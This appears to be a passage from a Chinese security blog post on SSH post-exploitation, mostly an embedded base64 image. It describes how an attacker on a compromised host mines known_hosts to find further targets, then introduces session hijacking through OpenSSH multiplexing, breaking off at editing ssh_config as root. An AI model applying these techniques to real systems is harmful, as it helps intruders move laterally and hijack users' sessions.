aaarticlea/png;base64,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" alt="" width="1062" height="56" />

在黑客控制了一台用户机器之后，通过查看known_hosts收集信息，将有可能获取到当前主机连接的下一台跳板机、内网、DMZ机器，以此扩大攻击面

Relevant Link:

https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf

5. SSH Session Hijacking without Re-Authentication

Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication

0x1：SSH multiplexing特征

Multiplexing is the ability to send more than one signal over a single line or connection.

With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.

0x2：Setting Up Multiplexing

需要明白的是，SSH劫持是发生在被黑客控制的机器上，黑客通过SSH劫持，希望能够无密码获得当前用户连接的远程ssh会话。

黑客需要修改的配置文件是受控制的用户机器上的配置文件。

1. 修改ssh配置【攻击者有root权限】

vim /etc/ssh/ssh_config

/*

..

